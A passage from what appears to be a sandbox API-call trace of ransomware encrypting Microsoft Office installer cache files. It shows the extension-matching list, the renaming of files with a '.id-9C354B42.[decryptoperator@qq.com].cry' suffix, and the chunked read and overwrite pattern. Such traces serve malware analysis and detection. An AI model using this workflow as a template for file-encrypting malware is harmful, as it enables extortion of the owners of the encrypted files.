(lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.503] lstrlenW (lpString=".jpg") returned 4 [0043.503] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0043.503] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0043.503] lstrlenW (lpString="InfoPathMUI.msi") returned 15 [0043.503] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0043.503] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=3124224) returned 1 [0043.503] CloseHandle (hObject=0x16c) returned 1 [0043.504] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi")) returned 0x2020 [0043.504] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.504] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0043.504] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0043.504] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0x0) returned 1 [0043.504] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.504] ReadFile (in: hFile=0x16c, lpBuffer=0x3630058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3630058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.551] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfe400, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.551] ReadFile (in: hFile=0x16c, lpBuffer=0x3670058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3670058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.666] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0043.666] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x2bac00, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.666] ReadFile (in: hFile=0x16c, lpBuffer=0x36b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x36b0058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.809] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.810] WriteFile (in: hFile=0x16c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xc010a, lpNumberOfBytesWritten=0x2b1fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fcb0*=0xc010a, lpOverlapped=0x0) returned 1 [0043.826] SetEndOfFile (hFile=0x16c) returned 1 [0043.827] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ef0060 [0043.827] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0043.827] WriteFile (in: hFile=0x16c, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0043.828] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfe400, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0043.828] WriteFile (in: hFile=0x16c, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0043.833] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x2bac00, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0043.833] WriteFile (in: hFile=0x16c, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0043.835] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ef0060 | out: hHeap=0x600000) returned 1 [0043.835] CloseHandle (hObject=0x16c) returned 1 [0043.835] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0043.835] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0043.835] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0043.835] lstrlenW (lpString=".doc") returned 4 [0043.835] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0043.835] lstrlenW (lpString=".docx") returned 5 [0043.835] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0043.835] lstrlenW (lpString=".pdf") returned 4 [0043.835] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0043.835] lstrlenW (lpString=".xls") returned 4 [0043.835] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0043.835] lstrlenW (lpString=".xlsx") returned 5 [0043.835] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0043.835] lstrlenW (lpString=".ppt") returned 4 [0043.835] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0043.835] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0043.835] lstrlenW (lpString=".zip") returned 4 [0043.835] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0043.835] lstrlenW (lpString=".rar") returned 4 [0043.835] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0043.835] lstrlenW (lpString=".bz2") returned 4 [0043.836] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0043.836] lstrlenW (lpString=".7z") returned 3 [0043.836] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0043.836] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0043.836] lstrlenW (lpString=".dbf") returned 4 [0043.836] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0043.836] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0043.836] lstrlenW (lpString=".1cd") returned 4 [0043.836] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0043.836] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0043.836] lstrlenW (lpString=".jpg") returned 4 [0043.836] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0043.836] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0043.836] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0043.836] lstrlenW (lpString=".doc") returned 4 [0043.836] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0043.836] lstrlenW (lpString=".docx") returned 5 [0043.836] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0043.836] lstrlenW (lpString=".pdf") returned 4 [0043.836] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0043.836] lstrlenW (lpString=".xls") returned 4 [0043.836] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0043.836] lstrlenW (lpString=".xlsx") returned 5 [0043.836] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0043.836] lstrlenW (lpString=".ppt") returned 4 [0043.836] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0043.836] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0043.836] lstrlenW (lpString=".zip") returned 4 [0043.836] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0043.836] lstrlenW (lpString=".rar") returned 4 [0043.836] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0043.836] lstrlenW (lpString=".bz2") returned 4 [0043.836] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0043.836] lstrlenW (lpString=".7z") returned 3 [0043.836] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0043.836] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0043.837] lstrlenW (lpString=".dbf") returned 4 [0043.837] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0043.837] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0043.837] lstrlenW (lpString=".1cd") returned 4 [0043.837] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0043.837] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0043.837] lstrlenW (lpString=".jpg") returned 4 [0043.837] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0043.837] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0043.837] lstrlenW (lpString="VisioLR.cab") returned 11 [0043.837] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0043.837] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=50823389) returned 1 [0043.837] CloseHandle (hObject=0x16c) returned 1 [0043.837] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab")) returned 0x2020 [0043.837] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.837] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0043.838] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0043.838] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0x0) returned 1 [0043.838] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.838] ReadFile (in: hFile=0x16c, lpBuffer=0x3630058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3630058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.936] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x1028049, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.937] ReadFile (in: hFile=0x16c, lpBuffer=0x3670058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3670058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.158] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.158] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x30380dd, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.158] ReadFile (in: hFile=0x16c, lpBuffer=0x36b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x36b0058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.242] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.242] WriteFile (in: hFile=0x16c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2b1fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0044.258] SetEndOfFile (hFile=0x16c) returned 1 [0044.258] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ef0060 [0044.258] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.258] WriteFile (in: hFile=0x16c, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.259] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x1028049, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.259] WriteFile (in: hFile=0x16c, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.260] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x30380dd, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.260] WriteFile (in: hFile=0x16c, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.262] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ef0060 | out: hHeap=0x600000) returned 1 [0044.262] CloseHandle (hObject=0x16c) returned 1 [0044.262] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0044.262] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0044.262] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0044.262] lstrlenW (lpString=".doc") returned 4 [0044.262] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.262] lstrlenW (lpString=".docx") returned 5 [0044.262] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0044.262] lstrlenW (lpString=".pdf") returned 4 [0044.262] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.262] lstrlenW (lpString=".xls") returned 4 [0044.262] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.262] lstrlenW (lpString=".xlsx") returned 5 [0044.262] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0044.262] lstrlenW (lpString=".ppt") returned 4 [0044.262] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.262] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0044.262] lstrlenW (lpString=".zip") returned 4 [0044.262] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.262] lstrlenW (lpString=".rar") returned 4 [0044.262] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.262] lstrlenW (lpString=".bz2") returned 4 [0044.262] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.263] lstrlenW (lpString=".7z") returned 3 [0044.263] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.263] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0044.263] lstrlenW (lpString=".dbf") returned 4 [0044.263] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.263] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0044.263] lstrlenW (lpString=".1cd") returned 4 [0044.263] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.263] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0044.263] lstrlenW (lpString=".jpg") returned 4 [0044.263] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.263] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0044.263] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0044.263] lstrlenW (lpString=".doc") returned 4 [0044.263] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.263] lstrlenW (lpString=".docx") returned 5 [0044.263] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0044.263] lstrlenW (lpString=".pdf") returned 4 [0044.263] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.263] lstrlenW (lpString=".xls") returned 4 [0044.263] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.263] lstrlenW (lpString=".xlsx") returned 5 [0044.263] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0044.263] lstrlenW (lpString=".ppt") returned 4 [0044.263] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.263] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0044.263] lstrlenW (lpString=".zip") returned 4 [0044.263] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.263] lstrlenW (lpString=".rar") returned 4 [0044.263] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.263] lstrlenW (lpString=".bz2") returned 4 [0044.263] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.263] lstrlenW (lpString=".7z") returned 3 [0044.263] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.263] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0044.263] lstrlenW (lpString=".dbf") returned 4 [0044.263] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.263] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0044.264] lstrlenW (lpString=".1cd") returned 4 [0044.264] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.264] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0044.264] lstrlenW (lpString=".jpg") returned 4 [0044.264] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.264] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0044.264] lstrlenW (lpString="ProjectMUI.msi") returned 14 [0044.264] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0044.452] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=2511872) returned 1 [0044.452] CloseHandle (hObject=0x1ec) returned 1 [0044.452] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi")) returned 0x2020 [0044.452] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.452] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0044.453] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0044.453] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0x0) returned 1 [0044.453] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.453] ReadFile (in: hFile=0x1ec, lpBuffer=0x3630058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3630058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.512] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xcc6aa, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.512] ReadFile (in: hFile=0x1ec, lpBuffer=0x3670058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3670058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.534] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.534] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x225400, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.534] ReadFile (in: hFile=0x1ec, lpBuffer=0x36b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x36b0058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.603] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.603] WriteFile (in: hFile=0x1ec, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x2b1fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0044.616] SetEndOfFile (hFile=0x1ec) returned 1 [0044.616] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3fd40b0 